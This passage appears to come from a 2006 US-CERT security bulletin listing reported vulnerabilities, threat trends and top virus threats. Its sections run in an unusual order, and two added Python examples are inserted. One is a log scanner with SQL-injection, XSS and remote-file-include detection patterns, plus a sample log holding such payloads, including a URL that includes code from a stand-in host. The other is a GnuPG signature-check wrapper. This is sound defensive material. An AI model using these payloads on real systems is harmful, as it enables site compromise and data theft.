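    "sqli": re.compile(r"'|--|/\*|\bunion\b|\bselect\b", re.I),
    "xss": re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I),
    "rfi": re.compile(r"^\s*(https?|ftp)://", re.I),
}


def scan_line(line_no: int, line: str) -> list:
    """Return (line_no, rule, field, value) findings for one log line."""
    m = LOG_RE.match(line)
    if m is None:
        return [(line_no, "unparsed", "-", line)]
    findings = []
    query = urlsplit(m.group("target")).query
    # parse_qsl percent-decodes, so an encoded quote (%27) is inspected as a quote.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for rule, pattern in RULES.items():
            if pattern.search(value):
                findings.append((line_no, rule, name, value))
    # Request headers are attacker-controlled too (ReloadCMS User-Agent entry).
    ua = m.group("ua")
    if RULES["xss"].search(ua):
        findings.append((line_no, "xss", "User-Agent", ua))
    return findings


def scan_log(text: str) -> list:
    """Scan a whole log; line numbers are 1-based for the analyst's benefit."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if line.strip():
            findings.extend(scan_line(line_no, line))
    return findings


# Constructed sample log (not real traffic); script and parameter names are
# the ones named in the table entries above.
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [01/Apr/2006:12:00:00 +0000] "GET /loginprocess.php?username=admin%27%20-- HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [01/Apr/2006:12:00:05 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "<script>alert(1)</script>"',
    '192.0.2.12 - - [01/Apr/2006:12:00:09 +0000] "GET /include/functions_install.php?vwar_root=http://198.51.100.7/x.txt? HTTP/1.1" 200 88 "-" "Mozilla/4.0"',
    '192.0.2.13 - - [01/Apr/2006:12:00:12 +0000] "GET /news.php?news=42 HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
])

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The patterns are deliberately coarse: legitimate values can contain an apostrophe or the word "select", so treat hits as candidates to review against the affected script names rather than as alerts, and note that POST bodies, which many of these login and registration scripts accept, are not in the access log at all.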

WebAPP

WebAPP 0.9.9.3.2

Cross-Site Scripting vulnerabilities have been reported due to insufficient sanitization of unspecified input before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client.

WebAPP Cross-Site Scripting

CVE-2006-1427

2.3

Secunia Advisory: SA19506, April 3, 2006

Websina

Bugzero 4.3.1

Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported due to insufficient sanitization of the 'msg' parameter in various scripts and of the 'entryId' parameter in 'edit.jsp', which could let a remote malicious user execute arbitrary HTML and script code; and a Cross-Site Scripting vulnerability was reported in 'edit.jsp' due to insufficient sanitization of the 'projectId' parameter and in 'error.jsp' due to insufficient sanitization of the 'error' parameter, which could let a remote malicious user execute arbitrary HTML and script code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, Proof of Concept exploits have been published.

Bugzero Multiple Cross-Site Scripting

CVE-2006-1580

4.7 Security Focus, Bugtraq ID: 17351, April 3, 2006

Wire Plastik Design

wpBlog 0.4

An SQL injection vulnerability has been reported in 'index.php' due to insufficient sanitization of the 'postid' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code.

No workaround or patch available at time of publishing.

Vulnerability can be exploited through a web client.

wpBlog SQL Injection

CVE-2006-1639

5.6 Secunia Advisory: SA19538, April 4, 2006

ZDaemon
X-Doom

ZDaemon 1.08.01, X-Doom VI 1.6.7

Several vulnerabilities have been reported: a buffer overflow vulnerability was reported in the 'is_client_wad_ok' function, which could let a remote malicious user execute arbitrary code; and a remote Denial of Service vulnerability was reported in the 'ZD_MissingPlayer(),' 'ZD_UseItem(),' and 'ZD_ValidClient()' functions when an invalid value is submitted.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, zdaebof.zip, has been published.

Zdaemon Remote Buffer Overflow & Denial of Service

CVE-2006-1592
CVE-2006-1593

7
(CVE-2006-1592)

2.3
(CVE-2006-1593)

Security Focus, Bugtraq ID: 17340, March 31, 2006


Wireless Trends & Vulnerabilities
This section contains wireless vulnerabilities, articles, and malicious code that has been identified during the current reporting period.
  • Security Worries Hang Up Mobile Plans: Research indicates that many companies are putting the introduction of new wireless technologies on hold because of IT security concerns. According to a survey published by Symantec and the research arm of the UK-based The Economist, the threat of virus attacks, potential flaws in smart phone software and a lack of wireless network access controls have forced many enterprises to slow their adoption of additional mobile applications and devices.
  • Municipal Wi-Fi Could Cause Headaches: According to the chief technology officer for AirDefense, the largest concern is the ability to compromise the security of the corporate local area network (LAN) regardless of how it is set up. "Even if you have a policy of no Wi-Fi [usage], suddenly Wi-Fi is available on the lamp pole outside."
  • 802.11w fills wireless security holes: IEEE 802.11i, the standard behind Wi-Fi Protected Access (WPA) and WPA2, introduced new cryptographic algorithms that patch the holes in the original Wired Equivalent Privacy (WEP) specification. The 802.11w task group is now looking at extending that protection beyond data frames to management frames, which perform the core operations of a network.
  • Spy program snoops on cell phones: New software that hides on cell phones and captures call logs and text messages is being sold as a way to monitor kids and spouses. But according to one security company, it is a Trojan horse. The FlexiSpy application captures call logs, text messages and mobile Internet activity, among other things.


General Trends
This section contains brief summaries and links to articles which discuss or present information pertinent to the cyber security community.
  • Multiple Buffer Overflow Vulnerabilities in RealNetworks, Inc.'s Products: US-CERT is aware of multiple vulnerabilities in RealNetworks, Inc.'s products. Each of these vulnerabilities may result in a buffer overflow within RealPlayer that could allow a remote attacker to execute arbitrary code.
  • US Takes Interest in DDoS Attacks: Senior levels of the US government are taking an interest in recent distributed Denial of Service (DDoS) attacks against the Internet's domain name system. In recent months, there have been large-scale and ongoing attacks against several DNS infrastructure providers, using a newly discovered method that enables attackers to greatly amplify the amount of attack traffic they can throw at their targets.
  • Active Exploitation of Cross-site Scripting Vulnerability in eBay.com: US-CERT is aware of an active exploitation of a cross-site scripting vulnerability in the eBay website. Successful exploitation may either allow an attacker to obtain sensitive data from stored cookies or redirect auction viewers to phishing sites where further disclosure of login credentials or personal information can occur. US-CERT VU#808921
  • Hackers Serve Rootkits with Bagles: According to F-Secure, the latest Bagle.GE variant loads a kernel-mode driver to hide the processes and registry keys of itself and other Bagle-related malware from security scanners. The use of offensive rootkits in existing virus threats signals an aggressive push by attackers to get around existing anti-virus software and maintain a persistent and undetectable presence on infected machines.
  • Survey: Identity theft hits 3 percent: According to a study based on the National Crime Victimization Survey (NCVS), an estimated 3.1 percent of American households became victims of identity theft in 2004. The study, which surveyed 42,000 households, found the most likely families to suffer identity theft included those with a young head of household (18 to 24 years of age) and those in the highest income bracket (greater than $75,000 per year). Identity theft was identified as the unauthorized use or attempted use of existing credit cards, accounts such as checking or brokerage accounts, or the misuse of information to obtain new credit accounts or to commit crimes.
  • 0603-exploits.tgz: Packet Storm new exploits for March, 2006.
  • Vendors failing to secure applications: According to Alan Paller, director of research at the SANS Institute, weak digital security in businesses helps hackers to fund criminal activity. Software application vendors are still failing to sell secure products, and it is a problem that is leaving customers open to hacking attacks.


Viruses/Trojans

Top Ten Virus Threats

A list of high threat viruses, as reported to various anti-virus vendors and virus incident reporting organizations, has been ranked and categorized in the table below. For the purposes of collecting and collating data, infections involving multiple systems at a single location are considered a single infection. It is therefore possible that a virus has infected hundreds of machines but has only been counted once. With the number of viruses that appear each month, it is possible that a new virus will become widely distributed before the next edition of this publication. To limit the possibility of infection, readers are reminded to update their anti-virus packages as soon as updates become available. The table lists the viruses by ranking (number of sites affected), common virus name, type of virus code (i.e., boot, file, macro, multi-partite, script), trends (based on number of infections reported since last week), and approximate date first found.

Rank | Common Name | Type of Code | Trend | Date | Description
1 | Netsky-P | Win32 Worm | Stable | March 2004 | A mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives. The worm also tries to spread through various file-sharing programs by copying itself into shared folders.
2 | Zafi-B | Win32 Worm | Stable | June 2004 | A mass-mailing worm that spreads via e-mail using several different languages, including English, Hungarian and Russian. When executed, the worm makes two copies of itself in the %System% directory with randomly generated file names.
3 | Lovgate.w | Win32 Worm | Stable | April 2004 | A mass-mailing worm that propagates by using MAPI to reply to messages, by using an internal SMTP engine, by dropping copies of itself on network shares, and through peer-to-peer networks. It attempts to access all machines in the local area network.
4 | Mytob.C | Win32 Worm | Increase | March 2004 | A mass-mailing worm with IRC backdoor functionality that can also infect computers vulnerable to the Windows LSASS (MS04-011) exploit. The worm attempts to harvest email addresses from the local hard disk by scanning files.
5 | Mytob-GH | Win32 Worm | Slight Decrease | November 2005 | A variant of the mass-mailing worm that disables security-related programs and allows others to access the infected system. This version sends itself to email addresses harvested from the system, forging the sender's address.
6 | Nyxem-D | Win32 Worm | New | March 2006 | A mass-mailing worm that turns off anti-virus software, deletes files, downloads code from the Internet, and installs itself in the registry. This version also harvests email addresses from the infected machine and uses its own emailing engine to forge the sender's address.
7 | Netsky-D | Win32 Worm | Decrease | March 2004 | A simplified variant of the Netsky mass-mailing worm: it does not contain many of the text strings that were present in Netsky.C and it does not copy itself to shared folders. Netsky.D spreads itself in e-mails as an executable attachment only.
8 | Mytob-BE | Win32 Worm | Increase | June 2005 | A slight variant of the mass-mailing worm that uses an IRC backdoor, the LSASS vulnerability, and email to propagate. It harvests addresses from the Windows address book, disables antivirus software, and modifies data.
9 | Mytob-AS | Win32 Worm | Decrease | June 2005 | A slight variant of the mass-mailing worm that disables security-related programs and processes, redirects various sites, and changes registry values. This version downloads code from the net and uses its own email engine.
10 | Zafi-D | Win32 Worm | Slight Decrease | December 2004 | A mass-mailing worm that sends itself to email addresses gathered from the infected computer. The worm may also attempt to lower security settings, terminate processes, and open a back door on the compromised computer.

Table updated April 3, 2006


The US-CERT Cyber Security Bulletin provides a summary of new and updated vulnerabilities, exploits, trends, and malicious code that have recently been openly reported. Information in the Cyber Security Bulletin is a compilation of open source and US-CERT vulnerability information. As such, the Cyber Security Bulletin includes information published by sources outside of US-CERT and should not be considered the result of US-CERT analysis or as an official report of US-CERT. Although this information does reflect open source reports, it is not an official description and should be used for informational purposes only. The intention of the Cyber Security Bulletin is to serve as a comprehensive directory of pertinent vulnerability reports, providing brief summaries and additional sources for further investigation.

Vulnerabilities
Wireless Trends & Vulnerabilities
General Trends
Viruses/Trojans


Vulnerabilities

The tables below summarize vulnerabilities that have been reported by various open source organizations or presented in newsgroups and on web sites. Items in bold designate updates that have been made to past entries. Entries are grouped by the operating system on which the reported software operates, and vulnerabilities which affect both Windows and Unix/Linux operating systems are included in the Multiple Operating Systems table. Note that entries in each table are not necessarily vulnerabilities in that operating system, but vulnerabilities in software that operates on some version of that operating system.

Entries may contain additional US-CERT sponsored information, including Common Vulnerabilities and Exposures (CVE) numbers, National Vulnerability Database (NVD) links, Common Vulnerability Scoring System (CVSS) values, Open Vulnerability and Assessment Language (OVAL) definitions, or links to US-CERT Vulnerability Notes. Metrics, values, and information included in the Cyber Security Bulletin which has been provided by other US-CERT sponsored programs, is prepared, managed, and contributed by those respective programs. CVSS values are managed and provided by the US-CERT/ NIST National Vulnerability Database. Links are also provided to patches and workarounds that have been provided by the product’s vendor.

The Risk levels are defined below:

High - Vulnerabilities will be labeled “High” severity if they have a CVSS base score of 7.0-10.0.

Medium - Vulnerabilities will be labeled “Medium” severity if they have a base CVSS score of 4.0-6.9.

Low - Vulnerabilities will be labeled “Low” severity if they have a CVSS base score of 0.0-3.9.

Note that scores provided prior to 11/9/2005 are approximated from only partially available CVSS metric data. Such scores are marked as "Approximated" within NVD. In particular, the following CVSS metrics are only partially available for these vulnerabilities and NVD assumes certain values based on an approximation algorithm: AccessComplexity, Authentication, ConfImpact of 'partial', IntegImpact of 'partial', AvailImpact of 'partial', and the impact biases.

Windows Operating Systems Only
Vendor & Software Name
Description

Common Name

CVSS
Resources
AN HTTPD 1.42n

A vulnerability has been reported in AN HTTPD that could let remote malicious users disclose information (script source).

Contact the vendor for AN HTTPD 1.42p.

Currently we are not aware of any exploits for this vulnerability.

AN HTTPD Information Disclosure

CVE-2006-1598

3.3 Secunia, Advisory: SA19326, April 3, 2006

Eset Software

NOD32 Antivirus 2.5

A vulnerability has been reported in NOD32 Antivirus that could let local malicious users obtain arbitrary file creation rights.

Upgrade to NOD32 Antivirus 2.51.26 via tool's online update capabilities.

There is no exploit code required.

NOD32 Antivirus Arbitrary File Creation

CVE-2006-0951

Not Available Secunia, Advisory: SA19054, April 5, 2006
EzASPSite 2.0 RC3

An input validation vulnerability has been reported in EzASPSite that could let remote malicious users perform SQL injection.

No workaround or patch available at time of publishing.

There is no exploit code required.

EzASPSite Default.ASP SQL Injection Vulnerability

CVE-2006-1541

3.3 Secunia, Advisory: SA19441, March 30, 2006

HP

Color LaserJet Toolbox 2500 and 4600 for Windows

An input validation vulnerability has been reported in Color LaserJet Toolbox that could let remote malicious users disclose information.

HP Solution

A Proof of Concept exploit has been published.

HP Color LaserJet Toolbox Information Disclosure

CVE-2006-1654

Not Available Security Focus, ID: 17367, April 4, 2006

McAfee

VirusScan 10.0.21, SecurityCenter Agent 6.0.0.16

A buffer overflow vulnerability has been reported in the DUNZIP32.dll component of VirusScan that could let remote malicious users obtain unauthorized access.

Upgrade to the newest version of DUNZIP32.dll via the tool's online update capabilities.

There is no exploit code required.

McAfee VirusScan Unauthorized Access

CVE-2004-1094

10 Secunia, Advisory: SA19460, March 30, 2006

McAfee

WebShield SMTP 4.5 MR1a

A vulnerability has been reported in WebShield that could let remote malicious users execute arbitrary code.

McAfee WebShield 4.5 MR2

There is no exploit code required.

McAfee WebShield Arbitrary Code Execution

CVE-2006-0559

10 Security Tracker, Alert ID: 1015861, April 4, 2006

Microsoft

Office XP, XP SP1, XP SP2, XP SP3

A vulnerability has been reported in Office XP (an array index error) that could let remote malicious users cause a Denial of Service.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, excel_03262006.rar, has been published.

Microsoft Office XP Denial of Service

CVE-2006-1540

1.4 Security Focus, ID: 17252, March 27, 2006

Microsoft

Windows Help File Viewer

A heap overflow vulnerability has been reported in Windows Help File Viewer that could let remote malicious users execute arbitrary code.

No workaround or patch available at time of publishing.

Currently we are not aware of any exploits for this vulnerability.

Microsoft Windows Help File Viewer Arbitrary Code Execution

CVE-2006-1591

5.6 Security Focus, ID: 17325, March 31, 2006

RealPlayer 8, 10, 10.0.6, 10.5, RealOne Player, and RealPlayer Enterprise

A buffer overflow vulnerability has been reported in RealPlayer, Mimio Broadcast file processing, that could let remote malicious users execute arbitrary code.

RealPlayer

There is no exploit code required.

RealPlayer Arbitrary Code Execution

CVE-2006-1370

7

Security Tracker, Alert ID: 1015810, March 24, 2006

US-CERT VU#451556

SiteSearch Indexer 3.5

An input validation vulnerability has been reported in SiteSearch Indexer, searchresults.asp, that could let remote malicious users conduct Cross-Site Scripting.

No workaround or patch available at time of publishing.

A Proof of Concept exploit has been published.

SiteSearch Indexer Cross-Site Scripting

CVE-2006-1567

2.3 Security Focus, ID: 17332, March 31, 2006

SMART Technologies

SynchronEyes 6.0

Multiple vulnerabilities have been reported in SynchronEyes that could let remote malicious users cause a Denial of Service.

No workaround or patch available at time of publishing.

There is no exploit code required.

SynchronEyes Denial of Service

CVE-2006-1647
CVE-2006-1648

Not Available Security Focus, ID: 17373, April 4, 2006
Total Commander prior to 6.54

A buffer overflow vulnerability has been reported in Total Commander that could let remote malicious users execute arbitrary code.

Total Commander 6.54

There is no exploit code required.

Total Commander Arbitrary Code Execution

Not Available Security Tracker, Alert ID: 1015852, March 31, 2006
UltraVNC 1.0.1

Multiple buffer overflow vulnerabilities have been reported in UltraVNC that could let remote malicious users execute arbitrary code.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, uvncbof.zip, has been published.

UltraVNC Arbitrary Code Execution

CVE-2006-1652

Not Available Security Focus, ID: 17378, April 4, 2006

UNIX / Linux Operating Systems Only
Vendor & Software Name
Description

Common Name

CVSS
Resources

Apple

Mac OS X Server 10.4.5, OS X 10.4.5

A vulnerability has been reported on Intel-based Macintosh computers due to an unspecified error, which could let a remote malicious user bypass the firmware password.

Updates available

Currently we are not aware of any exploits for this vulnerability.

Mac OS X Firmware Password Bypass

CVE-2006-0401

4.9 Apple Security Advisory, APPLE-SA-2006-04-03, April 3, 2006

Apple

Safari RSS 2.3 pre-release, 2.0-2.0.2, 1.3, 1.2-1.2.3, 1.0, 1.1, Beta 2, Mac OS X Server 10.4-10.4.5, Mac OS X 10.4-10.4.5

A remote Denial of Service vulnerability has been reported in 'ImageIO' due to a failure to properly handle malicious image files.

No workaround or patch available at time of publishing.

There is no exploit code required.

Apple Mac OS X Remote Denial of Service

CVE-2006-1552

2.3 Security Focus, Bugtraq ID: 17321, March 30, 2006

BusyBox

BusyBox Linux Utilities

A vulnerability has been reported in 'passwd' due to a design flaw that results in password hashes being created in an insecure manner, which could let a malicious user bypass security restrictions.

No workaround or patch available at time of publishing.

Precomputed password hashes can be used to exploit this vulnerability.

BusyBox Insecure Password Hash

CVE-2006-1058

1.6 Secunia Advisory: SA19477, March 31, 2006

Crafty Syntax Image Gallery

Crafty Syntax Image Gallery 3.1g.

Several vulnerabilities have been reported: an SQL injection vulnerability was reported in 'slides.php' due to insufficient sanitization of the 'limitquery_s' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code; and a vulnerability was reported due to insufficient verification of images during the upload process, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, an exploit script, crappy_syntax.pl, has been published.

Crafty Syntax Image Gallery SQL Injection & Image Verification
Not Available Secunia Advisory: SA19478, April 5, 2006

FreeRADIUS

FreeRADIUS 1.0-1.0.5

A vulnerability has been reported in the EAP-MSCHAPv2 state machine due to an error, which could let a malicious user bypass authentication and cause a Denial of Service.

Updates available

SuSE

RedHat

Gentoo

Currently we are not aware of any exploits for this vulnerability.

FreeRADIUS EAP-MSCHAPv2 Authentication Bypass

CVE-2006-1354

8

Security Focus, Bugtraq ID: 17171, March 21, 2006

SUSE Security Announcement, SUSE-SA:2006:019, March 28, 2006

RedHat Security Advisory, RHSA-2006:0271-11, April 4, 2006

Gentoo Linux Security Advisory, GLSA 200604-03, April 4, 2006

GNU

Mailman 2.1-2.1.5, 2.0-2.0.14

A remote Denial of Service vulnerability has been reported in 'Scrubber.py' due to a failure to handle exception conditions when Python fails to process an email file attachment that contains utf8 characters in its filename.

Mandriva

SuSE

Ubuntu

Debian

RedHat

Trustix

SGI

There is no exploit code required.

GNU Mailman Attachment Scrubber UTF8 Filename Remote Denial of Service

CVE-2005-3573

Secunia Advisory: SA17511, November 14, 2005

Mandriva Linux Security Advisory, MDKSA-2005:222, December 2, 2005

SUSE Security Summary Report, SUSE-SR:2006:001, January 13, 2006

Ubuntu Security Notice, USN-242-1 January 16, 2006

Debian Security Advisory, DSA-955-1, January 25, 2006

RedHat Security Advisory, RHSA-2006:0204-10, March 7, 2006

Trustix Secure Linux Security Advisory #2006-0012, March 10, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

GNU

GNU Privacy Guard prior to 1.4.2.2.

A vulnerability has been reported due to an error in the detection of unsigned data, which could let a remote malicious user inject arbitrary data and bypass verification.

Updates available

Debian

Gentoo

Fedora

SuSE

Slackware

RedHat

Ubuntu

Trustix

SGI

There is no exploit code required.

GnuPG Unsigned Data Injection Detection

CVE-2006-0049

GNU Security Advisory, March 9, 2006

Debian Security Advisory, DSA 993-1, March 10, 2006

Gentoo Linux Security Advisory, GLSA 200603-08, March 10, 2006

SUSE Security Announcement, SUSE-SA:2006:014, March 10, 2006

Slackware Security Advisory, SSA:2006-072-02, March 13, 2006

RedHat Security Advisory, RHSA-2006:0266-8, March 15, 2006

Ubuntu Security Notice, USN-264-1, March 13, 2006

Trustix Secure Linux Security Advisory #2006-0014, March 20, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

GnuPG

GnuPG / gpg prior to 1.4.2.1

A vulnerability has been reported because 'gpgv' (or 'gpg --verify') exits with a return code of 0 even if the detached signature file did not carry any signature, which could let a remote malicious user bypass security restrictions.

Patches available

Fedora

Debian

Mandriva

Ubuntu

Gentoo

SuSE

SuSE

SuSE

Slackware

RedHat

SGI

There is no exploit code required; however, a Proof of Concept exploit has been published.

GnuPG Detached Signature Verification Bypass

CVE-2006-0455

4.9

GnuPG Advisory, February 15, 2006

Fedora Update Notification,
FEDORA-2006-116, February 17, 2006

Debian Security Advisory,
DSA-978-1, February 17, 2006

Mandriva Security Advisory, MDKSA-2006:043, February 17, 2006

Ubuntu Security Notice, USN-252-1, February 17, 2006

Gentoo Linux Security Advisory, GLSA 200602-10, February 18, 2006

SuSE Security Announcement, SUSE-SA:2006:009, February 20, 2006

SUSE Security Announcement, SUSE-SA:2006:013, March 1, 2006

SUSE Security Summary Report, SUSE-SR:2006:005, March 3, 2006

Slackware Security Advisory, SSA:2006-072-02, March 13, 2006

RedHat Security Advisory, RHSA-2006:0266-8, March 15, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006
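The GnuPG entry above matters mostly to scripts that wrap gpgv and treat an exit status of 0 as proof that a download was verified; a signature file carrying no signature packet satisfied that test in the affected versions. The following is an added example, not GnuPG project code: a Python wrapper that accepts data only when a VALIDSIG line naming the expected key fingerprint appears on --status-fd, which is the check GnuPG's advisory recommends for scripts, with the exit status used as an additional condition rather than the only one. The fingerprint and status transcripts below are constructed placeholders, and the keyring, signature and data paths are whatever the caller supplies.

```python
"""Added example (not GnuPG project code): verify a detached signature without
trusting gpgv's exit status alone; require VALIDSIG with a pinned fingerprint."""
import subprocess

# Status keywords that mean "do not trust this data", whatever the exit code.
REJECT = {"BADSIG", "ERRSIG", "NODATA", "EXPSIG", "EXPKEYSIG", "REVKEYSIG", "NO_PUBKEY"}


def signature_is_valid(status_text: str, expected_fpr: str) -> bool:
    """Parse --status-fd output; True only if a VALIDSIG line carries expected_fpr.

    An empty transcript (no signature was seen at all) is a failure, which is
    exactly the case an exit-status-only check got wrong."""
    valid = False
    for line in status_text.splitlines():
        if not line.startswith("[GNUPG:] "):
            continue  # ignore human-readable output mixed into the stream
        fields = line.split()
        keyword = fields[1] if len(fields) > 1 else ""
        if keyword in REJECT:
            return False
        # VALIDSIG <fingerprint> <date> <timestamp> ... ; pin the fingerprint
        # rather than the short key ID, which is trivially collidable.
        if keyword == "VALIDSIG" and len(fields) > 2 and fields[2].upper() == expected_fpr.upper():
            valid = True
    return valid


def verify_detached(sig_path: str, data_path: str, keyring_path: str, expected_fpr: str) -> bool:
    """Run gpgv on a detached signature. Exit code 0 is necessary, not sufficient."""
    proc = subprocess.run(
        ["gpgv", "--keyring", keyring_path, "--status-fd", "1", sig_path, data_path],
        capture_output=True, text=True, check=False,
    )
    return proc.returncode == 0 and signature_is_valid(proc.stdout, expected_fpr)


# Constructed status transcripts; the fingerprint is a placeholder, not a real key.
FPR = "0123456789ABCDEF0123456789ABCDEF01234567"
GOOD_STATUS = "\n".join([
    "[GNUPG:] SIG_ID abc123 2006-04-05 1144195200",
    "[GNUPG:] GOODSIG 0123456789ABCDEF Example Signer <signer@example.invalid>",
    "[GNUPG:] VALIDSIG " + FPR + " 2006-04-05 1144195200 0 4 0 17 2 00 " + FPR,
    "[GNUPG:] TRUST_FULLY",
])
NO_SIGNATURE_STATUS = "[GNUPG:] NODATA 1"  # file carried no signature packet
BAD_STATUS = "[GNUPG:] BADSIG 0123456789ABCDEF Example Signer <signer@example.invalid>"

if __name__ == "__main__":
    print("good transcript:", signature_is_valid(GOOD_STATUS, FPR))
    print("empty transcript:", signature_is_valid("", FPR))
    print("no signature packet:", signature_is_valid(NO_SIGNATURE_STATUS, FPR))
```

Pinning the fingerprint also sidesteps trust-model questions (the TRUST_* lines) for the common case of a single known release key; where several keys are acceptable, check each fingerprint and require a match on any one of them.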

Hitachi

XFIT/S, XFIT/S/JCA, XFIT/S/ZGN, XFIT/S ZENGIN

A remote Denial of Service vulnerability has been reported due to an unspecified error when the service receives data unexpectedly.

Update information

Currently we are not aware of any exploits for this vulnerability.

Hitachi XFIT/S Remote Denial of Service

CVE-2006-1609

2.3 Hitachi Security Advisory, HS06-004, March 31, 2006

Horde Project

Horde Application Framework 3.0.9 & prior

A vulnerability has been reported in 'services/go.php' due to insufficient verification of the 'url' parameter before using in a 'readfile()' call, which could let a remote malicious user obtain sensitive information.

Updates available

Gentoo

Currently we are not aware of any exploits for this vulnerability.

Horde Information Disclosure

CVE-2006-1260

2.3

Secunia Advisory: SA19246, March 15, 2006

Gentoo Linux Security Advisory, GLSA 200604-02, April 4, 2006

Kaffeine

Kaffeine Media Player 0.4.2-0.7.1

A buffer overflow vulnerability has been reported in the 'http_peek()' function when creating HTTP request headers for retrieving remote playlists, which could let a remote malicious user execute arbitrary code.

Patches available

Debian

Mandriva

Gentoo

Currently we are not aware of any exploits for this vulnerability.

Kaffeine Buffer Overflow

CVE-2006-0051

5.6

KDE Security Advisory, April 4, 2006

Debian Security Advisory, DSA-1023-1, April 5, 2006

Mandriva Linux Security Advisory MDKSA-2006:065, April 5, 2006

Gentoo Linux Security Advisory, GLSA 200604-04, April 5, 2006

MediaWiki

MediaWiki 1.5.7

An HTML injection vulnerability has been reported in the Encoded Page Link due to insufficient sanitization of user-supplied input before using it in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code.

Updates available

SuSE

Gentoo

Vulnerability can be exploited via a web client.

MediaWiki HTML Injection

CVE-2006-1498

2.3

Security Focus, Bugtraq ID: 17269, March 27, 2006

SUSE Security Summary Report, SUSE-SR:2006:007, March 31, 2006

Gentoo Linux Security Advisory, GLSA 200604-01, April 4, 2006

mpg123

mpg123 0.59r

A vulnerability has been reported when handling MP3 streams, which could let a remote malicious user corrupt memory or possibly execute arbitrary code.

No workaround or patch available at time of publishing.

A Proof of Concept Denial of Service exploit script, mpg1DoS3.pl, has been published.

MPG123 Malformed MP3 File Memory Corruption

CVE-2006-1655

Not Available Security Focus, Bugtraq ID: 17365, April 4, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14

A Denial of Service vulnerability has been reported in 'net/ipv6/udp.c' due to an infinite loop error in the 'udp_v6_get_port()' function.

Fedora

Upgrades available

Ubuntu

SUSE

RedHat

RedHat

RedHat

SmoothWall

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel IPV6 Denial of Service

CVE-2005-2973

Secunia Advisory: SA17261, October 21, 2005

Fedora Update Notifications, FEDORA-2005-1007 & 1013, October 20, 2005

Security Focus, Bugtraq ID: 15156, October 31, 2005

Ubuntu Security Notice, USN-219-1, November 22, 2005

SUSE Security Announcement, SUSE-SA:2005:067, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

RedHat Security Advisories, RHSA-2006:0190-5 & RHSA-2006:0191-9, February 1, 2006

SmoothWall Advisory, March 15, 2006

Debian Security Advisory, DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

RedHat Fedora Core4, Enterprise Linux WS 3, WS 2.1 IA64, WS 2.1, ES 3, ES 2.1 IA64, ES 2.1, AS 3, AS 2.1 IA64, AS 2.1, Advanced Workstation for the Itanium Processor 2.1 IA64, 2.1;
PHP PHP 5.1-5.1.3, 5.0-5.0.2, 4.4.0-4.4.2, 4.3-4.3.11, 4.2-4.2.3, 4.1.0-4.1.2, 4.0.0-4.0.7

A Cross-site scripting vulnerability has been reported in 'phpinfo()' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code.

A CVS fix is available.

Vulnerability may be exploited with a web client.

PHP 'PHPInfo' Cross-Site Scripting

Not Available

Security Focus, Bugtraq ID: 17362, April 4, 2006

Multiple Vendors

Squid Web Proxy Cache 2.5.STABLE1, 2.5.STABLE3-STABLE10

A remote Denial of Service vulnerability has been reported when handling certain client NTLM authentication request sequences.

Upgrades available

Ubuntu

Debian

Mandriva

SCO

SUSE

RedHat

RHSA-2006:0045-8

SGI

Currently we are not aware of any exploits for this vulnerability.

Squid NTLM Authentication Remote Denial of Service

CVE-2005-2917

Secunia Advisory: SA16992, September 30, 2005

Ubuntu Security Notice, USN-192-1, September 30, 2005

Debian Security Advisory, DSA 828-1, September 30, 2005

Mandriva Linux Security Update Advisory, MDKSA-2005:181, October 11, 2005

SCO Security Advisory, SCOSA-2005.44, November 1, 2005

SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005

SUSE Security Summary Report, SUSE-SR:2005:027, November 18, 2005

RedHat Security Advisory, RHSA-2006:0052-7, March 7, 2006

RedHat Security Advisory, RHSA-2006:0045-8, March 15, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Multiple Vendors

Ubuntu Linux 5.10 powerpc, i386, amd64, 5.04 powerpc, i386, amd64, 4.1 ppc, ia64, ia32;
MandrakeSoft Linux Mandrake 10.2 x86_64, 10.2, Corporate Server 3.0 x86_64, 3.0;
GNU Mailman 2.1-2.1.5, 2.0-2.0.14, 1.0, 1.1; Debian Linux 3.1, sparc, s/390, ppc, mipsel, mips, m68k, ia-64, ia-32, hppa, arm, amd64, alpha

A remote Denial of Service vulnerability has been reported in the attachment-scrubber utility.

Update to version 2.1.6 or later.

Mandriva

Ubuntu

Debian

There is no exploit code required.

GNU Mailman Attachment Scrubber Remote Denial of Service

CVE-2006-0052

Security Focus, Bugtraq ID: 17311, March 29, 2006

Mandriva Security Advisory, MDKSA-2006:061, March 29, 2006

Ubuntu Security Notice, USN-267-1, April 03, 2006

Debian Security Advisory, DSA-1027-1, April 6, 2006

Multiple Vendors

